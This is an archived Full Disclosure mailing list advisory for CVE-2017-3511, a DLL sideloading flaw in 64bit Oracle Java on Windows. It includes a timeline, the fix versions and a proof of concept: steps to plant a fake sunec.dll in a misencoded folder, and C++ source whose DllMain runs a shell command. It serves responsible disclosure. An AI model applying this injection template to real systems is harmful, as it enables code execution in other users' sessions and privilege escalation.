[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[FD] Code Injection through DLL Sideloading in 64bit Oracle Java

To: fulldisclosure@xxxxxxxxxxxx
Subject: [FD] Code Injection through DLL Sideloading in 64bit Oracle Java
From: Florian Bogner <florian@xxxxxxxxx>
Date: Wed, 19 Apr 2017 20:57:59 +0200

Code Injection through DLL Sideloading in 64bit Oracle Java

Metadata
===================================================
Release Date: 19-March-2017
Author: Florian Bogner // https://bogner.sh
Affected product: 64bit Oracle Java on Windows (https://java.com/en/)
Fixed in: Java SE: 7u131, 8u121; Java SE Embedded: 8u121; JRockit: R28.3.13
Tested on: Windows 7 and Windows 2008R2
CVE:  CVE-2017-3511
URL: 
https://bogner.sh/2017/04/cve-2017-3511-code-injection-through-dll-sideloading-in-64bit-oracle-java
Video: https://youtu.be/bEiC4JLrV_4
Vulnerability Status: Fixed in Oracle Critical Patch Update Advisory - April 
2017

Product Description
===================================================
Java is a set of computer software and specifications developed by Sun 
Microsystems, which was later acquired by the Oracle Corporation, that provides 
a system for developing application software and deploying it in a 
cross-platform computing environment. Java is used in a wide variety of 
computing platforms from embedded devices and mobile phones to enterprise 
servers and supercomputers.
~https://en.wikipedia.org/wiki/Java_(software_platform)

Vulnerability Description
===================================================
Vulnerable 64bit Oracle Java versions on Windows try to load some of their 
(crypto) dependencies from the non-existing folder 
C:\Program%20Files\Java\jre[version]\lib\ext. This is most likely caused by 
some kind of encoding issue as %20 represents an URL-encoded space. As any 
local user is allowed to append new folders on the C: drive’s root, the 
Program%20Files folder can be created. Thereby, any local user can place a 
malicious DLL into C:\Program%20Files\Java\jre1.8.0_101\lib\ext.

Hence, code can be injected into other user’s Windows sessions. Additionally if 
any vulnerable Java application is running as privileged application (SYSTEM, 
local admin, domain admin) this issue can also be used to escalate one’s 
permissions vertically.

Suggested Solution
===================================================
Update to the latest version.

Disclosure Timeline
===================================================
8.8.2016: The issues have been documented and reported
10.8.2016: The issue has been confirmed by the vendor
6.12.2016: CVE-2017-3511 has been assigned
19.4.2017: Fix release in Oracle’s Critical Patch Update April 2017

PoC
===================================================
1.) Build a "malicious" affected DLL like sunec.dll
2.) Create the folder structure C:\Program%20Files\Java\jre1.8.0_101\lib\ext 
and place it in there.
3.) Start a vulnerable application (like Burp or Angry IP Scanner)

The following source can be used to build the DLL
#include <process.h>

/*      
        "C:\Program Files (x86)\Microsoft Visual Studio 14.0\VC\vcvarsall.bat" 
amd64
        cl.exe /D_USRDLL /D_WINDLL sunec.cpp /link /DLL /OUT:sunec.dll
*/

/* export all required functions - use Dependency Walker to check what is 
needed */
extern "C"
  {
   __declspec(dllexport) int Java_sun_security_ec_ECDHKeyAgreement_deriveKey();
   __declspec(dllexport) int Java_sun_security_ec_ECDSASignature_signDigest();
   __declspec(dllexport) int 
Java_sun_security_ec_ECDSASignature_verifySignedDigest();
   __declspec(dllexport) int 
Java_sun_security_ec_ECKeyPairGenerator_generateECKeyPair();
  }

/* 
        Implement DLLMain with common datatypes so we don't have to include 
windows.h. 
*/
int DllMain(void* hinst, unsigned long* reason, void* reserved) {
        system("powershell -Command 
\"[System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');[System.Windows.Forms.MessageBox]::Show('DLL
 Loaded')\"");
        exit(1);
        return 0;
}

/* Implement stubs of our exports */
int Java_sun_security_ec_ECDHKeyAgreement_deriveKey() {
    return 0;
}

int Java_sun_security_ec_ECDSASignature_signDigest() {
    return 0;
}

int Java_sun_security_ec_ECDSASignature_verifySignedDigest() {
    return 0;
}

int Java_sun_security_ec_ECKeyPairGenerator_generateECKeyPair() {
    return 0;
}

Florian Bogner

eMail: florian@xxxxxxxxx
Web: http://www.bogner.sh
LinkedIn: https://www.linkedin.com/profile/view?id=368904276
Xing: https://www.xing.com/profile/Florian_Bogner9


_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Prev by Date: [FD] SecretServerSecretStealer - An extraction utility for Thycotic Secret Server
Next by Date: [FD] CVE-2017-7991-SQL injection-Exponent CMS
Previous by thread: [FD] SecretServerSecretStealer - An extraction utility for Thycotic Secret Server
Next by thread: [FD] CVE-2017-7991-SQL injection-Exponent CMS
Index(es):
- Date
- Thread